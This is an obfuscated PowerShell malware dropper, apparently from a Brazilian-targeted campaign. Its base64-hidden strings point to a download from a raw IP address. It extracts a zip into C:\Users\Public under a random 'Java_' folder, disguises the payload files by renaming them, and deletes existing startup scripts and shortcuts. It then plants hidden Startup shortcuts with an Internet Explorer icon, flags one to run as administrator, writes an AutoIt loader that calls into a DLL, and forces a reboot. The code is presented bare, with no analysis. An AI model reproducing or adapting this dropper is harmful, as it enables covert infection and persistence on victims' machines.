Dropper

1. ${_/|\_/|////\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQB4AGUA')))
2. ${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('egBpAHAA')))
3. ${_/|\_/|////\__|//\\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA1ADEALgA5ADEALgAyADQAOAAuADgANgAvAHUAawAvAE0AMgA0ADAANgAvAGsAawAvAG0AZAAuAHoAaQBwAA==')))
4. ${_/|\_/|/\\\\\\\/|_} = "public"
5. ${_\\\\\\/|\_/|/\\\\\\\/|_} = "c:\users\${_/|\_/|/\\\\\\\/|_}"
6. Function ____////////\\\/\/\/\/\_____ {
7. ${_|||||||||||||________________} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
8. ${_|||||||||||||//////________________} = "2_","3_","4_","5_","6_","7_","8_","9_"
9. ${_|||||||||||||//////\\\\\________________} = $null
10. ${__|||||||||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________} -Count 6
11. ${__||||||_|||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||//////________________} -Count 1
12. ${__||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1
13. foreach($n in ${__|||||||||||||//////\\\\\________________}) {
14. ${_|||||||||||||//////\\\\\________________} += $n
15. }
16. foreach ($n2 in ${__||||||_|||||||//////\\\\\________________}) {
17. ${_|||||||||||||//////\\\\\________________} += $n2
18. }
19. foreach ($n3 in ${__||||||_||||||_|//////\\\\\________________}) {
20. ${_|||||||||||||//////\\\\\________________} += $n3
21. }
22. return "Java_${_|||||||||||||//////\\\\\________________}"
23. }
24. ${_\\\\\\/|\_/|/\\\___\\\\/|_} = ____////////\\\/\/\/\/\_____
25. ${_\\\\\__\/|\_/|/\\\___\\\\/|_} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
26. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} = if (${_\\\\\__\/|\_/|/\\\___\\\\/|_}) { Test-Path ${_\\\\\__\/|\_/|/\\\___\\\\/|_} }
27. ${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_}
28. if(${_\\\//////////\\__\/|\_/|/\\\___\\\\/|_} -eq 'True'){
29. exit
30. }else{
31. New-Item -ItemType directory -Path ${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}
32. ${_\\\///////\\\\\\\\\\/_} = new-object System.Net.WebClient
33. ${_\\\///////\\\\\\\\\\/_}.DownloadFile(${_/|\_/|////\__|//\\\\\\\\/|_},"${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.zip")
34. ${_\\\//////||\||||/\\\\\\\/_} = new-object -com shell.application
35. ${_/\/\/\/\/\/\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_}")
36. ${_/\/\/\/\/\/__|\\\||||||\/\/_} = ${_\\\//////||\||||/\\\\\\\/_}.namespace("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}")
37. ${_/\/\/\/\/\/__|\\\||||||\/\/_}.Copyhere(${_/\/\/\/\/\/\/\/_}.items())
38. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_/|\_/|////\__|/_|\\\\\\/|_}.png")
39. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\12.dll")
40. Rename-Item -NewName ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sqlite3.dll") -Path ("${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\sql.png")
41. function _____/\_/\/\_/\/=\
42. {
43. Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
44. try{
45. ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
46. ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
47. ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
48. ${/=\/\__/=\/=\/=\_}.Arguments = " ${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS ${_\\\\\\/|\_/|/\\\___\\\\/|_}"
49. ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}"
50. ${/=\/\__/=\/=\/=\_}.WindowStyle = 7
51. ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
52. ${/=\/\__/=\/=\/=\_}.Save()
53. }finally{}
54. }
55. ${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
56. ${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
57. del ${/=\_/\_/===\/\/\/}\*.vbs
58. del ${/=\_/\_/===\/\/\/}\*.lnk
59. ${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
60. ${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
61.  
62. _____/\_/\/\_/\/=\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
63.  
64. _____/\_/\/\_/\/=\ "c:\users\public\c.lnk" ${_/=\/=\/\_/\/=\__}
65. $bytes = [System.IO.File]::ReadAllBytes("c:\users\public\c.lnk")
66. $bytes[0x15] = $bytes[0x15] -bor 0x20 #set byte 21 (0x15) bit 6 (0x20) ON
67. [System.IO.File]::WriteAllBytes("c:\users\public\c.lnk", $bytes)
68. function _____/\_/\/\_/\/=\\///\/\/\
69. {
70. Param([string]${___/\_/=\\/\/\\___/\_/==},[string]${__||_/\_/=\\/\/\\___/\_/==});
71. try{
72. ${__||_/\_/=\\/\/||\\___/\_/==} = New-Object -ComObject WScript.Shell
73. ${__||/=\\/\/||\\___/\_/==} = ${__||_/\_/=\\/\/||\\___/\_/==}.CreateShortcut(${___/\_/=\\/\/\\___/\_/==})
74. ${__||/=\\/\/||\\___/\_/==}.TargetPath = "c:\users\${_/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.vbs"
75. ${__||/=\\/\/||\\___/\_/==}.Arguments = ""
76. ${__||/=\\/\/||\\___/\_/==}.Description = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgBBAGMAZQBzAHMAYQByACAAYQAgAGkAbgB0AGUAcgBuAGUAdAAuACIA')));
77. ${__||/=\\/\/||\\___/\_/==}.WorkingDirectory = ""
78. ${__||/=\\/\/||\\___/\_/==}.IconLocation = "${_/\/\/\/\__/\|_||_|____}"
79. ${__||/=\\/\/||\\___/\_/==}.Save()
80. }finally{}
81. }
82.  
83. ${_/\/\/\__\\\\\\\|||\/\/_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
84. ${_/\/\/\__\\\\\\\|||\/\/_} | Set-Content "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
85. ${_/\/\/\__\\\\\\\|||\/\/_} | Out-File "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
86. ${_/\/\/\__\\\\\\\|||\/\/_} > "${_\\\\\\/|\_/|/\\\\\\\/|_}\i.dat"
87.  
88. ${___/\_/\/===\/\__} = "c:\users\public\chrome.lnk"
89. _____/\_/\/\_/\/=\\///\/\/\ ${___/\_/\/===\/\__} ${__||_/\_/=\\/\/\\___/\_/==}
90.  
91. ${_/|\_/|//______//\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABpAG4AZQA=')))
92. ${_/|\_\\\||||||||||///\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBtAGQA')))
93. ${_/|\_\\\///\\/|_} = '86'
94. ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_} = "$"
95. $Arquivo = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
96.  
97. $ArquivoSaida ="${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}1.LNS"
98. Add-Content $Arquivo '#NoTrayIcon'
99. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_} = ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_/|\_\\\||||||||||///\\/|_}${_/|\_/|//______//\__|/_|\\\\\\/|_}[1]"
100. Add-Content $Arquivo "Global ${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_} = DllOpen('${_\\\\\\/|\_/|/\\\___\\\\/|_}.LNS')"
101. Add-Content $Arquivo "DllCall(${_/|\_/|//______//\__|/_|\\\\__\\\///\\/|_}${_\\\\\\/|\_/|/\\\___\\\\/|_}${_/|\_\\\///\\/|_}, 'STRUCT', 'JLI_CmdToArgs')"
102.  
103.  
104. C:\WINDOWS\system32\shutdown.exe -r -t 200
105.  
106. }